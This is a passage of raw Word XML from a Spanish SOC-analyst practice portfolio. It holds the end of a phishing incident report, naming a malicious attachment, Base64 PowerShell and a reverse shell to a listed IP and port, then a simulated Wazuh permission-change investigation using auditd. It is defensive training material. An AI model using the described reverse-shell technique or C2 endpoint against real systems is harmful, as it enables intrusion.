        </w:rPr>
        <w:t xml:space="preserve">dropper/loader</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> que estableció una </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, dándole al atacante una vía de control remoto activo sobre el equipo.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qnb2smfpd1p" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Informe de incidente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Vector:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Phishing por correo electrónico con archivo adjunto malicioso (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">factura_0847.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) disfrazado de factura de proveedor. Al ejecutarse, lanzó PowerShell con comando codificado en Base64, estableciendo una conexión reverse shell hacia una IP externa (91.203.145.12:4444).</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Impacto:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Compromiso del endpoint del empleado de Contabilidad con posible control remoto activo por parte del atacante. Impacto contenido antes de confirmar exfiltración de datos o movimiento lateral, gracias a la detección temprana por el propio usuario y el aislamiento oportuno del equipo.</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Remediación aplicada:</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Aislamiento de red del equipo afectado (sin apagarlo, para preservar evidencia en memoria).</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Bloqueo de IP y puerto de C2 (Command &amp; Control) a nivel de firewall perimetral: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">91.203.145.12:4444</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</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Revisión de logs en busca de movimiento lateral hacia otros equipos de la red interna.</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Preservación del archivo malicioso y el correo original como evidencia.</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Capacitación/concientización al empleado y al resto del equipo sobre identificación de phishing.</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Documentación del caso e IOCs (indicadores de compromiso) en el playbook del equipo para referencia futura.</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Framework de referencia:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> MITRE ATT&amp;CK — T1566.001 (Phishing: Spearphishing Attachment), T1059.001 (Command and Scripting Interpreter: PowerShell), T1071 (Application Layer Protocol / C2)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gbng46m3ucmi" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CASO 4: Alerta de acceso público no autorizado detectada por Wazuh</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Nota:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> práctica teórica y de razonamiento — comandos y logs simulados con fines de aprendizaje, no ejecutados en un entorno real.</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Contexto:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Analista SOC junior en una pyme. Wazuh, configurado para monitorear la infraestructura de la empresa, generó una alerta de severidad alta.</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Alerta recibida (panel de Wazuh):</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Regla disparada: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"File permissions changed to world-readable"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — se detectó un cambio de permisos en el directorio </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/srv/clientes-docs/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> del servidor de archivos Linux, otorgando lectura a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">todos los usuarios del sistema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con permisos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aplicado recursivamente). Evento ocurrido a las 09:14 AM.</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Tarea:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> determinar si fue un cambio legítimo o un error/ataque, desde cuándo está así, y corregirlo.</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ln15e5jab4k" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Análisis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 Verificación de permisos actuales</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000068">
      <w:pPr>
        <w:rPr>
          <w:color w:val="008000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0051c2"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="14181f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="008000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-la</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="14181f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="008000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/srv/clientes-docs/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirma lo reportado por Wazuh: la tríada de permisos "otros" muestra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(lectura pública), cuando debería estar restringida solo al grupo/usuario correspondiente.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2. Corrección del permiso</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="008000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0051c2"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="14181f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="008000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-R</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="14181f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="008000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">o-r</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="14181f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="008000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/srv/clientes-docs/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>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aplica el cambio recursivamente a todo el contenido de la carpeta;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quita el permiso de lectura al grupo "otros" (usuarios sin autorización), revirtiendo la exposición.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3. Investigación de quién y cuándo — logs de auditoría (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">auditd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -la</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> solo muestra el estado actual de los permisos, no quién hizo el cambio ni cuándo. Para eso se recurre a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">auditd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, el sistema de auditoría de Linux que registra comandos ejecutados por usuario:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000070">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000071">
      <w:pPr>
        <w:rPr>
          <w:color w:val="008000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0051c2"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ausearch</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="14181f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="008000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-f</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="14181f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="008000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/srv/clientes-docs</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="14181f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="008000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-ts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="14181f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="008000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">today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Resultado simulado:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000073">
      <w:pPr>
        <w:rPr>
          <w:color w:val="14181f"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="14181f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">type=PATH msg=audit(1725433640.123): item=0 name="/srv/clientes-docs"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074">
      <w:pPr>
        <w:rPr>
          <w:color w:val="14181f"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="14181f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">type=SYSCALL msg=audit(1725433640.123): syscall=chmod success=yes exit=0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075">
      <w:pPr>
        <w:rPr>
          <w:color w:val="14181f"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="14181f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  a0=... a1=0755 auid=1003 uid=1003 gid=1003</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000076">
      <w:pPr>
        <w:rPr>
          <w:color w:val="14181f"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="14181f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  comm="chmod" exe="/usr/bin/chmod"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000077">
      <w:pPr>
        <w:rPr>
          <w:color w:val="14181f"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="14181f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">type=USER_LOGIN msg=audit(1725433640.100): auid=1003 pid=8821</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">auid=1003</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> identifica al usuario real que ejecutó el comando (audit user id, no falseable fácilmente). Se cruza con:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="0051c2"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="14181f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="008080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1003</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">resultando en el usuario </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mgarcia</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, del área de Sistemas, con acceso dentro de su horario laboral habitual (09:14 AM). No se detectan señales de compromiso: sin acceso externo, sin credenciales robadas, sin herramientas maliciosas.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2jtxf9fjf5ol" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Informe — Security Finding (No incidente de seguridad)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Hallazgo:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> El día del evento, a las 09:14 AM (horario laboral habitual), Wazuh detectó un cambio de permisos en </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/srv/clientes-docs/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, otorgando lectura pública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 todos los usuarios del sistema.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Investigación:</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auditd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ausearch</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) se identificó que el cambio fue ejecutado por el usuario </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mgarcia</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (UID 1003), del área de Sistemas, dentro de su horario habitual de trabajo. No se detectaron señales de compromiso.</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Clasificación:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> No se confirma incidente de seguridad. Se trata de un cambio de configuración realizado por personal autorizado, pendiente de determinar si fue intencional o accidental.</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Acciones tomadas:</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Corrección inmediata del permiso (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod -R o-r /srv/clientes-docs/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">).</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Consulta directa con </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mgarcia</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> para determinar el motivo del cambio (tarea rutinaria mal ejecutada, error de tipeo, o necesidad legítima no comunicada al equipo de seguridad).</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Determinación del tiempo total de exposición (desde las 09:14 AM hasta la corrección) para evaluar si hubo acceso indebido de terceros durante esa ventana.</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Registro del hallazgo como recordatorio de buenas prácticas: cambios de permisos en directorios sensibles deben pasar por revisión o notificación previa al equipo de seguridad.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Nota de clasificación:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> a diferencia de los Casos 1, 2 y 3 (incidentes con atacante confirmado), este caso se clasifica como </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Finding</w:t>
